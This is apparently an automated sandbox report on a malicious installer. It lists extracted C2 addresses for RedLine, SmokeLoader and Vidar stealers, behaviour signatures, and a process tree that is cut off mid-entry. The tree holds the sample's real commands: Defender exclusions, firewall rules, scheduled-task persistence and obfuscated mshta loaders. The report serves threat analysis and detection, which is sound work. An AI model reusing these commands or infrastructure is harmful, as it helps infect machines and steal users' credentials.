Analysis

  • max time kernel
    559s
  • max time network
    1215s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    16-10-2021 06:42

General

  • Target

    setup_x86_x64_install.exe

  • Size

    5.4MB

  • MD5

    423afe97280c0e85a4abcbb5c8a6f575

  • SHA1

    2ea6e70005ca3f494d4476152a74b07437f1321c

  • SHA256

    e759267b9357b6c8a56c5b72c9f61e5aeaf11a49fb7f2517b6432c38b14d3c8c

  • SHA512

    2dd5f4e828acd96fd96a03b4cb87173de9ef44ec0063a14c9aa5858758e824f56c4e36f3e0da0f49295b8ad40937c41bcf9efb289f0f0193a15d87c327ce8d09

Malware Config

Extracted

Family

redline

Botnet

ANI

C2

194.104.136.5:46013

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.4

Botnet

933

C2

https://mas.to/@sslam

Attributes
  • profile_id

    933

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 13 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 9 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1128
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s BITS
      1⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      PID:4036
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:5232
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2768
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2688
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Modifies registry class
          PID:2624
          • C:\Windows\system32\wbem\WMIADAP.EXE
            wmiadap.exe /F /T /R
            2⤵
              PID:5968
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2448
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2412
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1904
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1412
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1368
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                      1⤵
                        PID:1240
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1044
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:376
                        • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1780
                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:520
                            • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\setup_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\setup_install.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:2400
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1168
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  5⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1472
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Sat02a49e7e3a431c7.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1748
                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02a49e7e3a431c7.exe
                                  Sat02a49e7e3a431c7.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:1424
                                  • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02a49e7e3a431c7.exe
                                    C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02a49e7e3a431c7.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:2232
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Sat0296c9dad7692023.exe /mixone
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1468
                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat0296c9dad7692023.exe
                                  Sat0296c9dad7692023.exe /mixone
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2340
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 660
                                    6⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4144
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 676
                                    6⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4572
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 640
                                    6⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4904
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 632
                                    6⤵
                                    • Program crash
                                    PID:4628
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 796
                                    6⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:3780
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Sat02392068575.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1148
                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02392068575.exe
                                  Sat02392068575.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2312
                                  • C:\Users\Admin\AppData\Roaming\2091177.scr
                                    "C:\Users\Admin\AppData\Roaming\2091177.scr" /S
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4384
                                  • C:\Users\Admin\AppData\Roaming\8678430.scr
                                    "C:\Users\Admin\AppData\Roaming\8678430.scr" /S
                                    6⤵
                                      PID:4988
                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4184
                                    • C:\Users\Admin\AppData\Roaming\1960350.scr
                                      "C:\Users\Admin\AppData\Roaming\1960350.scr" /S
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4380
                                    • C:\Users\Admin\AppData\Roaming\2353271.scr
                                      "C:\Users\Admin\AppData\Roaming\2353271.scr" /S
                                      6⤵
                                      • Executes dropped EXE
                                      PID:1868
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Sat02bf7d5639a.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:932
                                  • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02bf7d5639a.exe
                                    Sat02bf7d5639a.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: MapViewOfSection
                                    PID:1740
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Sat023473347dfed5a.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1460
                                  • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat023473347dfed5a.exe
                                    Sat023473347dfed5a.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1808
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      6⤵
                                        PID:5936
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im chrome.exe
                                          7⤵
                                          • Kills process with taskkill
                                          PID:6364
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sat02827e2943c1f18a7.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1312
                                    • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02827e2943c1f18a7.exe
                                      Sat02827e2943c1f18a7.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:3348
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sat02b7c3d3dc184.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:976
                                    • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02b7c3d3dc184.exe
                                      Sat02b7c3d3dc184.exe
                                      5⤵
                                        PID:2128
                                        • C:\Users\Admin\AppData\Local\Temp\is-7MKAH.tmp\Sat02b7c3d3dc184.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-7MKAH.tmp\Sat02b7c3d3dc184.tmp" /SL5="$6007C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02b7c3d3dc184.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:3620
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Sat02a6e1469543.exe
                                      4⤵
                                        PID:1692
                                        • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02a6e1469543.exe
                                          Sat02a6e1469543.exe
                                          5⤵
                                            PID:1780
                                            • C:\Users\Admin\Pictures\Adobe Films\Aw26_UX_b5OjlBhIQ724U7Rr.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\Aw26_UX_b5OjlBhIQ724U7Rr.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:5280
                                            • C:\Users\Admin\Pictures\Adobe Films\_tIh8ajDtJ8V2GlO8GhpPeyj.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\_tIh8ajDtJ8V2GlO8GhpPeyj.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:5988
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                7⤵
                                                • Creates scheduled task(s)
                                                PID:5196
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                7⤵
                                                • Creates scheduled task(s)
                                                PID:2012
                                              • C:\Users\Admin\Documents\ICVZ4OgeIR2j7QNMSvT6MyHr.exe
                                                "C:\Users\Admin\Documents\ICVZ4OgeIR2j7QNMSvT6MyHr.exe"
                                                7⤵
                                                • Checks computer location settings
                                                PID:3720
                                                • C:\Users\Admin\Pictures\Adobe Films\Y5XwXscIm_XtaaZo0GUcarzL.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\Y5XwXscIm_XtaaZo0GUcarzL.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  PID:4988
                                                • C:\Users\Admin\Pictures\Adobe Films\KdM8ocRyYY7DEAY9Eb7pBHe8.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\KdM8ocRyYY7DEAY9Eb7pBHe8.exe"
                                                  8⤵
                                                    PID:4568
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                      9⤵
                                                        PID:6940
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im chrome.exe
                                                          10⤵
                                                          • Kills process with taskkill
                                                          PID:5972
                                                    • C:\Users\Admin\Pictures\Adobe Films\qpdHtcKUMXmD2vwxnIaad1BM.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\qpdHtcKUMXmD2vwxnIaad1BM.exe"
                                                      8⤵
                                                        PID:5428
                                                      • C:\Users\Admin\Pictures\Adobe Films\ut2MOrud3zcaSq8JCdYykF9k.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\ut2MOrud3zcaSq8JCdYykF9k.exe"
                                                        8⤵
                                                          PID:6284
                                                        • C:\Users\Admin\Pictures\Adobe Films\7W8dnEFaKljkfJGuqtYsTDUA.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\7W8dnEFaKljkfJGuqtYsTDUA.exe" /mixtwo
                                                          8⤵
                                                            PID:6320
                                                          • C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe"
                                                            8⤵
                                                              PID:2836
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                9⤵
                                                                  PID:5688
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\1recqd0wnz8MYTSqt2EVk8kk.exe" ) do taskkill -f -iM "%~NxM"
                                                                    10⤵
                                                                      PID:7016
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        11⤵
                                                                          PID:6812
                                                                        • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                          ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                          11⤵
                                                                            PID:4716
                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                              12⤵
                                                                                PID:6528
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                  13⤵
                                                                                    PID:5648
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      14⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:4664
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                  12⤵
                                                                                    PID:6856
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                      13⤵
                                                                                        PID:4420
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                          14⤵
                                                                                            PID:196
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                            14⤵
                                                                                            • Blocklisted process makes network request
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Drops file in Program Files directory
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:4712
                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                            msiexec -Y ..\lXQ2g.WC
                                                                                            14⤵
                                                                                              PID:8060
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill -f -iM "1recqd0wnz8MYTSqt2EVk8kk.exe"
                                                                                        11⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:6560
                                                                                • C:\Users\Admin\Pictures\Adobe Films\2RQZs2lRHhHIqqQr_YCCMiQQ.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\2RQZs2lRHhHIqqQr_YCCMiQQ.exe"
                                                                                  8⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:7164
                                                                                • C:\Users\Admin\Pictures\Adobe Films\J45YdlvWxBoQLQKu5cw_ERgd.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\J45YdlvWxBoQLQKu5cw_ERgd.exe"
                                                                                  8⤵
                                                                                    PID:2528
                                                                                    • C:\Users\Admin\AppData\Roaming\4484656.scr
                                                                                      "C:\Users\Admin\AppData\Roaming\4484656.scr" /S
                                                                                      9⤵
                                                                                        PID:1532
                                                                                      • C:\Users\Admin\AppData\Roaming\4773166.scr
                                                                                        "C:\Users\Admin\AppData\Roaming\4773166.scr" /S
                                                                                        9⤵
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:5716
                                                                                      • C:\Users\Admin\AppData\Roaming\6570948.scr
                                                                                        "C:\Users\Admin\AppData\Roaming\6570948.scr" /S
                                                                                        9⤵
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:6224
                                                                                      • C:\Users\Admin\AppData\Roaming\4801276.scr
                                                                                        "C:\Users\Admin\AppData\Roaming\4801276.scr" /S
                                                                                        9⤵
                                                                                        • Checks BIOS information in registry
                                                                                        • Checks whether UAC is enabled
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:6748
                                                                                      • C:\Users\Admin\AppData\Roaming\6894827.scr
                                                                                        "C:\Users\Admin\AppData\Roaming\6894827.scr" /S
                                                                                        9⤵
                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                        PID:1300
                                                                                      • C:\Users\Admin\AppData\Roaming\6031617.scr
                                                                                        "C:\Users\Admin\AppData\Roaming\6031617.scr" /S
                                                                                        9⤵
                                                                                          PID:6312
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\tgdoWe9Qqt4pT7t1E_r5AuK_.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\tgdoWe9Qqt4pT7t1E_r5AuK_.exe"
                                                                                        8⤵
                                                                                          PID:6480
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\b5DiBxi2yLwUIPKwwgOhKvSb.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\b5DiBxi2yLwUIPKwwgOhKvSb.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5492
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\ag5bLzmbIPswLxkJKAqcCpxW.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\ag5bLzmbIPswLxkJKAqcCpxW.exe"
                                                                                      6⤵
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:5724
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\GBMyUUq444Yqq4aftaPk5C8v.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\GBMyUUq444Yqq4aftaPk5C8v.exe"
                                                                                      6⤵
                                                                                        PID:1364
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im GBMyUUq444Yqq4aftaPk5C8v.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\GBMyUUq444Yqq4aftaPk5C8v.exe" & del C:\ProgramData\*.dll & exit
                                                                                          7⤵
                                                                                            PID:6332
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im GBMyUUq444Yqq4aftaPk5C8v.exe /f
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:608
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              timeout /t 6
                                                                                              8⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:8428
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\HPXDwV6g1BIHbihogOBNdIge.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\HPXDwV6g1BIHbihogOBNdIge.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Windows directory
                                                                                          PID:5056
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                            7⤵
                                                                                              PID:704
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Drops file in Program Files directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:2392
                                                                                            • C:\Windows\System32\netsh.exe
                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                              7⤵
                                                                                                PID:2116
                                                                                              • C:\Windows\System32\netsh.exe
                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                7⤵
                                                                                                  PID:7024
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Sat025fdceb8a76.exe
                                                                                            4⤵
                                                                                              PID:2936
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat025fdceb8a76.exe
                                                                                                Sat025fdceb8a76.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2348
                                                                                                • C:\Windows\SysWOW64\mshta.exe
